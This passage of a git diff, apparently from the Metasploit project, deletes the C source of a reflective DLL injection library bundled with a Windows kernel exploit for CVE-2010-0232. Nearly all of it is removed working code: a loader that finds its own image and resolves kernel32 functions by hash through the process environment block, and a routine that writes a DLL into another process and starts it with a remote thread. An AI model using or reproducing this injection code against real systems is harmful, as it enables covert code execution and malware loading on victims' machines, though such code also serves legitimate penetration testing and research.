(PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions ); - - // get the VA for the array of name pointers - uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals ); - - // test if we are importing by name or by ordinal... - if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 ) - { - // import by ordinal... - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) ); - - // resolve the address for this imported function - fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // import by name... - DWORD dwCounter = pExportDirectory->NumberOfNames; - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray )); - - // test if we have a match... - if( strcmp( cpExportedFunctionName, lpProcName ) == 0 ) - { - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // calculate the virtual address for the function - fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray )); - - // finish... - break; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - fpResult = NULL; - } - - return fpResult; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h deleted file mode 100644 index 6f4729dd5d..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h +++ /dev/null @@ -1,36 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c deleted file mode 100644 index 88d5be96b9..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c +++ /dev/null @@ -1,233 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - // This will catch Win32 and WinRT. - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. - if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... - dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// -// Loads a DLL image from memory via its exported ReflectiveLoader function -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ) -{ - HMODULE hResult = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwOldProtect1 = 0; - DWORD dwOldProtect2 = 0; - REFLECTIVELOADER pReflectiveLoader = NULL; - DLLMAIN pDllMain = NULL; - - if( lpBuffer == NULL || dwLength == 0 ) - return NULL; - - __try - { - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( dwReflectiveLoaderOffset != 0 ) - { - pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset); - - // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader... - // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region - if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) ) - { - // call the librarys ReflectiveLoader... - pDllMain = (DLLMAIN)pReflectiveLoader(); - if( pDllMain != NULL ) - { - // call the loaded librarys DllMain to get its HMODULE - // Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only. - if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) ) - hResult = NULL; - } - // revert to the previous protection flags... - VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 ); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hResult = NULL; - } - - return hResult; -} -//===============================================================================================// -// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function -// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -// defined in order to use the correct RDI prototypes. -// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | -// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ -// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space. -// Note: This function currently cant inject accross architectures, but only to architectures which are the -// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64. -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ) -{ - LPVOID lpRemoteLibraryBuffer = NULL; - LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL; - HANDLE hThread = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwThreadId = 0; - - __try - { - do - { - if( !hProcess || !lpBuffer || !dwLength ) - break; - - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( !dwReflectiveLoaderOffset ) - break; - - // alloc memory (RWX) in the host process for the image... - lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - if( !lpRemoteLibraryBuffer ) - break; - - // write the image into the host process... - if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) ) - break; - - // add the offset to ReflectiveLoader() to the remote library address... - lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset ); - - // create a remote thread in the host process to call the ReflectiveLoader! - hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId ); - - } while( 0 ); - - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hThread = NULL; - } - - return hThread; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h deleted file mode 100644 index ad57808084..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h +++ /dev/null @@ -1,41 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); - -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h deleted file mode 100644 index 23d607ee00..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h +++ /dev/null @@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c deleted file mode 100644 index a302e3903d..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c +++ /dev/null @@ -1,599 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#pragma intrinsic( _ReturnAddress ) -// This function can not be inlined by the compiler or we will not get the address we expect. Ideally -// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of -// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics -// available (and no inline asm available under x64). -__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); } -//===============================================================================================// - -#ifdef ENABLE_OUTPUTDEBUGSTRING -#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str) -#else /* ENABLE_OUTPUTDEBUGSTRING */ -#define OUTPUTDBG(str) do{}while(0) -#endif - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA = NULL; - GETPROCADDRESS pGetProcAddress = NULL; - VIRTUALALLOC pVirtualAlloc = NULL; - NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; -#ifdef ENABLE_STOPPAGING - VIRTUALLOCK pVirtualLock = NULL; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - OUTPUTDEBUG pOutputDebug = NULL; -#endif - - USHORT usCounter; - - // the initial location of this image in memory - ULONG_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - ULONG_PTR uiBaseAddress; - - // variables for processing the kernels export table - ULONG_PTR uiAddressArray; - ULONG_PTR uiNameArray; - ULONG_PTR uiExportDir; - ULONG_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - ULONG_PTR uiHeaderValue; - ULONG_PTR uiValueA; - ULONG_PTR uiValueB; - ULONG_PTR uiValueC; - ULONG_PTR uiValueD; - ULONG_PTR uiValueE; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our callers return address. - uiLibraryAddress = caller(); - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else -#ifdef WIN_ARM - uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); -#else _WIN32 - uiBaseAddress = __readfsdword( 0x30 ); -#endif -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the module name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; -#ifdef ENABLE_STOPPAGING - usCounter++; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - usCounter++; -#endif - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH - || dwHashValue == GETPROCADDRESS_HASH - || dwHashValue == VIRTUALALLOC_HASH -#ifdef ENABLE_STOPPAGING - || dwHashValue == VIRTUALLOCK_HASH -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - || dwHashValue == OUTPUTDEBUG_HASH -#endif - ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#ifdef ENABLE_STOPPAGING - else if( dwHashValue == VIRTUALLOCK_HASH ) - pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - else if( dwHashValue == OUTPUTDEBUG_HASH ) - pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( 